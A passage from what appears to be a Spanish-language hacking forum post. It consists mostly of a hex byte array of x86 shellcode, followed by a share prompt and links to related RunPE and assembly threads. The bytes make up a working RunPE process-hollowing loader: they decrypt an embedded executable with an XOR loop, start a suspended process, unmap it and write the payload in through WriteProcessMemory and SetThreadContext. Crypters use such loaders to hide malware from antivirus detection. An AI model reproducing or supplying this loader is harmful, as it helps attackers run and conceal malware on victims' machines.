$45,$A4,$6C,$C6,$45,$A5,$65,$C6,$45,$A6,$41,$C6,$45,$A7,$00,$C6,$45,$84,$47,$C6,$45,$85,$65,$C6,$45,
$86,$74,$C6,$45,$87,$4D,$C6,$45,$88,$6F,$C6,$45,$89,$64,$C6,$45,$8A,$75,$C6,$45,$8B,$6C,$C6,$45,$8C,
$65,$C6,$45,$8D,$46,$C6,$45,$8E,$69,$C6,$45,$8F,$6C,$C6,$45,$90,$65,$C6,$45,$91,$4E,$C6,$45,$92,$61,
$C6,$45,$93,$6D,$C6,$45,$94,$65,$C6,$45,$95,$41,$C6,$45,$96,$00,$C6,$85,$6F,$FF,$FF,$FF,$5A,$C6,$85,
$70,$FF,$FF,$FF,$77,$C6,$85,$71,$FF,$FF,$FF,$55,$C6,$85,$72,$FF,$FF,$FF,$6E,$C6,$85,$73,$FF,$FF,$FF,
$6D,$C6,$85,$74,$FF,$FF,$FF,$61,$C6,$85,$75,$FF,$FF,$FF,$70,$C6,$85,$76,$FF,$FF,$FF,$56,$C6,$85,$77,
$FF,$FF,$FF,$69,$C6,$85,$78,$FF,$FF,$FF,$65,$C6,$85,$79,$FF,$FF,$FF,$77,$C6,$85,$7A,$FF,$FF,$FF,$4F,
$C6,$85,$7B,$FF,$FF,$FF,$66,$C6,$85,$7C,$FF,$FF,$FF,$53,$C6,$85,$7D,$FF,$FF,$FF,$65,$C6,$85,$7E,$FF,
$FF,$FF,$63,$C6,$85,$7F,$FF,$FF,$FF,$74,$C6,$45,$80,$69,$C6,$45,$81,$6F,$C6,$45,$82,$6E,$C6,$45,$83,
$00,$C6,$85,$60,$FF,$FF,$FF,$56,$C6,$85,$61,$FF,$FF,$FF,$69,$C6,$85,$62,$FF,$FF,$FF,$72,$C6,$85,$63,
$FF,$FF,$FF,$74,$C6,$85,$64,$FF,$FF,$FF,$75,$C6,$85,$65,$FF,$FF,$FF,$61,$C6,$85,$66,$FF,$FF,$FF,$6C,
$C6,$85,$67,$FF,$FF,$FF,$41,$C6,$85,$68,$FF,$FF,$FF,$6C,$C6,$85,$69,$FF,$FF,$FF,$6C,$C6,$85,$6A,$FF,
$FF,$FF,$6F,$C6,$85,$6B,$FF,$FF,$FF,$63,$C6,$85,$6C,$FF,$FF,$FF,$45,$C6,$85,$6D,$FF,$FF,$FF,$78,$C6,
$85,$6E,$FF,$FF,$FF,$00,$C6,$85,$4F,$FF,$FF,$FF,$56,$C6,$85,$50,$FF,$FF,$FF,$69,$C6,$85,$51,$FF,$FF,
$FF,$72,$C6,$85,$52,$FF,$FF,$FF,$74,$C6,$85,$53,$FF,$FF,$FF,$75,$C6,$85,$54,$FF,$FF,$FF,$61,$C6,$85,
$55,$FF,$FF,$FF,$6C,$C6,$85,$56,$FF,$FF,$FF,$50,$C6,$85,$57,$FF,$FF,$FF,$72,$C6,$85,$58,$FF,$FF,$FF,
$6F,$C6,$85,$59,$FF,$FF,$FF,$74,$C6,$85,$5A,$FF,$FF,$FF,$65,$C6,$85,$5B,$FF,$FF,$FF,$63,$C6,$85,$5C,
$FF,$FF,$FF,$74,$C6,$85,$5D,$FF,$FF,$FF,$45,$C6,$85,$5E,$FF,$FF,$FF,$78,$C6,$85,$5F,$FF,$FF,$FF,$00,
$C6,$85,$3D,$FF,$FF,$FF,$52,$C6,$85,$3E,$FF,$FF,$FF,$65,$C6,$85,$3F,$FF,$FF,$FF,$61,$C6,$85,$40,$FF,
$FF,$FF,$64,$C6,$85,$41,$FF,$FF,$FF,$50,$C6,$85,$42,$FF,$FF,$FF,$72,$C6,$85,$43,$FF,$FF,$FF,$6F,$C6,
$85,$44,$FF,$FF,$FF,$63,$C6,$85,$45,$FF,$FF,$FF,$65,$C6,$85,$46,$FF,$FF,$FF,$73,$C6,$85,$47,$FF,$FF,
$FF,$73,$C6,$85,$48,$FF,$FF,$FF,$4D,$C6,$85,$49,$FF,$FF,$FF,$65,$C6,$85,$4A,$FF,$FF,$FF,$6D,$C6,$85,
$4B,$FF,$FF,$FF,$6F,$C6,$85,$4C,$FF,$FF,$FF,$72,$C6,$85,$4D,$FF,$FF,$FF,$79,$C6,$85,$4E,$FF,$FF,$FF,
$00,$C6,$85,$2A,$FF,$FF,$FF,$57,$C6,$85,$2B,$FF,$FF,$FF,$72,$C6,$85,$2C,$FF,$FF,$FF,$69,$C6,$85,$2D,
$FF,$FF,$FF,$74,$C6,$85,$2E,$FF,$FF,$FF,$65,$C6,$85,$2F,$FF,$FF,$FF,$50,$C6,$85,$30,$FF,$FF,$FF,$72,
$C6,$85,$31,$FF,$FF,$FF,$6F,$C6,$85,$32,$FF,$FF,$FF,$63,$C6,$85,$33,$FF,$FF,$FF,$65,$C6,$85,$34,$FF,
$FF,$FF,$73,$C6,$85,$35,$FF,$FF,$FF,$73,$C6,$85,$36,$FF,$FF,$FF,$4D,$C6,$85,$37,$FF,$FF,$FF,$65,$C6,
$85,$38,$FF,$FF,$FF,$6D,$C6,$85,$39,$FF,$FF,$FF,$6F,$C6,$85,$3A,$FF,$FF,$FF,$72,$C6,$85,$3B,$FF,$FF,
$FF,$79,$C6,$85,$3C,$FF,$FF,$FF,$00,$C6,$85,$19,$FF,$FF,$FF,$47,$C6,$85,$1A,$FF,$FF,$FF,$65,$C6,$85,
$1B,$FF,$FF,$FF,$74,$C6,$85,$1C,$FF,$FF,$FF,$54,$C6,$85,$1D,$FF,$FF,$FF,$68,$C6,$85,$1E,$FF,$FF,$FF,
$72,$C6,$85,$1F,$FF,$FF,$FF,$65,$C6,$85,$20,$FF,$FF,$FF,$61,$C6,$85,$21,$FF,$FF,$FF,$64,$C6,$85,$22,
$FF,$FF,$FF,$43,$C6,$85,$23,$FF,$FF,$FF,$6F,$C6,$85,$24,$FF,$FF,$FF,$6E,$C6,$85,$25,$FF,$FF,$FF,$74,
$C6,$85,$26,$FF,$FF,$FF,$65,$C6,$85,$27,$FF,$FF,$FF,$78,$C6,$85,$28,$FF,$FF,$FF,$74,$C6,$85,$29,$FF,
$FF,$FF,$00,$C6,$85,$08,$FF,$FF,$FF,$53,$C6,$85,$09,$FF,$FF,$FF,$65,$C6,$85,$0A,$FF,$FF,$FF,$74,$C6,
$85,$0B,$FF,$FF,$FF,$54,$C6,$85,$0C,$FF,$FF,$FF,$68,$C6,$85,$0D,$FF,$FF,$FF,$72,$C6,$85,$0E,$FF,$FF,
$FF,$65,$C6,$85,$0F,$FF,$FF,$FF,$61,$C6,$85,$10,$FF,$FF,$FF,$64,$C6,$85,$11,$FF,$FF,$FF,$43,$C6,$85,
$12,$FF,$FF,$FF,$6F,$C6,$85,$13,$FF,$FF,$FF,$6E,$C6,$85,$14,$FF,$FF,$FF,$74,$C6,$85,$15,$FF,$FF,$FF,
$65,$C6,$85,$16,$FF,$FF,$FF,$78,$C6,$85,$17,$FF,$FF,$FF,$74,$C6,$85,$18,$FF,$FF,$FF,$00,$C6,$85,$FB,
$FE,$FF,$FF,$52,$C6,$85,$FC,$FE,$FF,$FF,$65,$C6,$85,$FD,$FE,$FF,$FF,$73,$C6,$85,$FE,$FE,$FF,$FF,$75,
$C6,$85,$FF,$FE,$FF,$FF,$6D,$C6,$85,$00,$FF,$FF,$FF,$65,$C6,$85,$01,$FF,$FF,$FF,$54,$C6,$85,$02,$FF,
$FF,$FF,$68,$C6,$85,$03,$FF,$FF,$FF,$72,$C6,$85,$04,$FF,$FF,$FF,$65,$C6,$85,$05,$FF,$FF,$FF,$61,$C6,
$85,$06,$FF,$FF,$FF,$64,$C6,$85,$07,$FF,$FF,$FF,$00,$C6,$45,$E2,$6E,$C6,$45,$E3,$74,$C6,$45,$E4,$64,
$C6,$45,$E5,$6C,$C6,$45,$E6,$6C,$C6,$45,$E7,$00,$C6,$85,$EC,$FE,$FF,$FF,$43,$C6,$85,$ED,$FE,$FF,$FF,
$72,$C6,$85,$EE,$FE,$FF,$FF,$65,$C6,$85,$EF,$FE,$FF,$FF,$61,$C6,$85,$F0,$FE,$FF,$FF,$74,$C6,$85,$F1,
$FE,$FF,$FF,$65,$C6,$85,$F2,$FE,$FF,$FF,$50,$C6,$85,$F3,$FE,$FF,$FF,$72,$C6,$85,$F4,$FE,$FF,$FF,$6F,
$C6,$85,$F5,$FE,$FF,$FF,$63,$C6,$85,$F6,$FE,$FF,$FF,$65,$C6,$85,$F7,$FE,$FF,$FF,$73,$C6,$85,$F8,$FE,
$FF,$FF,$73,$C6,$85,$F9,$FE,$FF,$FF,$41,$C6,$85,$FA,$FE,$FF,$FF,$00,$C6,$85,$DF,$FE,$FF,$FF,$4C,$C6,
$85,$E0,$FE,$FF,$FF,$6F,$C6,$85,$E1,$FE,$FF,$FF,$61,$C6,$85,$E2,$FE,$FF,$FF,$64,$C6,$85,$E3,$FE,$FF,
$FF,$4C,$C6,$85,$E4,$FE,$FF,$FF,$69,$C6,$85,$E5,$FE,$FF,$FF,$62,$C6,$85,$E6,$FE,$FF,$FF,$72,$C6,$85,
$E7,$FE,$FF,$FF,$61,$C6,$85,$E8,$FE,$FF,$FF,$72,$C6,$85,$E9,$FE,$FF,$FF,$79,$C6,$85,$EA,$FE,$FF,$FF,
$41,$C6,$85,$EB,$FE,$FF,$FF,$00,$8D,$85,$DF,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$E8,
$8B,$75,$0C,$4E,$85,$F6,$7C,$17,$46,$33,$DB,$8B,$45,$08,$8A,$04,$03,$34,$2A,$34,$87,$8B,$55,$08,$88,
$04,$13,$43,$4E,$75,$EC,$8B,$45,$08,$89,$45,$AC,$8D,$45,$97,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,
$8D,$45,$84,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$F0,$6A,$69,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,
$D3,$50,$FF,$D6,$8D,$85,$7C,$FE,$FF,$FF,$BB,$43,$00,$00,$00,$C6,$04,$03,$00,$4B,$83,$FB,$FF,$75,$F6,
$C7,$85,$7C,$FE,$FF,$FF,$44,$00,$00,$00,$8D,$85,$EC,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,
$D8,$8D,$85,$C0,$FE,$FF,$FF,$50,$8D,$85,$7C,$FE,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,$6A,$00,$6A,$00,
$6A,$00,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,$D3,$8D,$85,$19,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,
$55,$EC,$8B,$D8,$C7,$85,$B0,$FD,$FF,$FF,$07,$00,$01,$00,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,
$FF,$FF,$50,$FF,$D3,$8D,$85,$3D,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8D,$45,$D0,$50,
$6A,$04,$8D,$45,$C8,$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,
$8D,$85,$6F,$FF,$FF,$FF,$50,$8D,$45,$E2,$50,$FF,$55,$E8,$50,$FF,$55,$EC,$8B,$D8,$8B,$45,$C8,$50,$8B,
$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$8B,$45,$AC,$8B,$40,$3C,$03,$45,$AC,$89,$45,$D4,$8D,$85,$60,$FF,$FF,
$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$6A,$40,$68,$00,$30,$00,$00,$8B,$45,$D4,$8B,$40,$50,$50,
$8B,$45,$D4,$8B,$40,$34,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$89,$45,$C8,$8D,$85,$2A,$FF,$FF,$FF,
$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F4,$8D,$45,$CC,$50,$8B,$45,$D4,$8B,$40,$54,$50,$8B,$45,$AC,
$50,$8B,$45,$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8D,$78,$18,$8B,$45,$D4,$0F,
$B7,$40,$14,$03,$F8,$8D,$85,$4F,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F8,$C7,$85,$90,
$FD,$FF,$FF,$01,$00,$00,$00,$C7,$85,$94,$FD,$FF,$FF,$10,$00,$00,$00,$C7,$85,$98,$FD,$FF,$FF,$02,$00,
$00,$00,$C7,$85,$9C,$FD,$FF,$FF,$20,$00,$00,$00,$C7,$85,$A0,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$A4,
$FD,$FF,$FF,$40,$00,$00,$00,$C7,$85,$A8,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$AC,$FD,$FF,$FF,$40,$00,
$00,$00,$8B,$45,$D4,$0F,$B7,$70,$06,$4E,$85,$F6,$7C,$66,$46,$33,$DB,$8D,$45,$CC,$50,$8D,$04,$9B,$8B,
$44,$C7,$10,$50,$8D,$04,$9B,$8B,$44,$C7,$14,$03,$45,$AC,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,$C8,
$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8D,$45,$C4,$50,$8D,$04,$9B,$8B,$44,$C7,$24,$C1,$E8,$1D,
$8B,$84,$85,$90,$FD,$FF,$FF,$50,$8D,$04,$9B,$8B,$44,$C7,$08,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,
$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F8,$43,$4E,$75,$9D,$8D,$45,$CC,$50,$6A,$04,$8D,$45,$C8,
$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8B,
$40,$28,$03,$45,$C8,$89,$85,$60,$FE,$FF,$FF,$8D,$85,$08,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,
$8B,$D8,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$8D,$85,$FB,$FE,$FF,$FF,$50,
$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$5F,$5E,$5B,$8B,$E5,$5D,$C2,
$08,$00                 
);

 

¿Te gustó el post? COMPARTILO!



[MASM] Shellcode RunPE

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3065
Último mensaje Junio 05, 2012, 04:44:43 pm
por ANTRAX
RunPE FASM

Iniciado por Juan

Respuestas: 4
Vistas: 4126
Último mensaje Julio 16, 2013, 07:26:11 pm
por Karcrack
[Guía NASM] Introducción a Netwide Assembler (Partes 1 y 2) (Descarga PDF)

Iniciado por yoyomismo

Respuestas: 5
Vistas: 7191
Último mensaje Abril 10, 2013, 12:07:21 pm
por yoyomismo
[NASM] Reverse string

Iniciado por Sanko

Respuestas: 2
Vistas: 2657
Último mensaje Febrero 22, 2014, 07:52:03 am
por Sanko
Socket con nasm... al fin lo logre

Iniciado por proxy_lainux

Respuestas: 2
Vistas: 2693
Último mensaje Julio 20, 2013, 07:43:30 pm
por Expermicid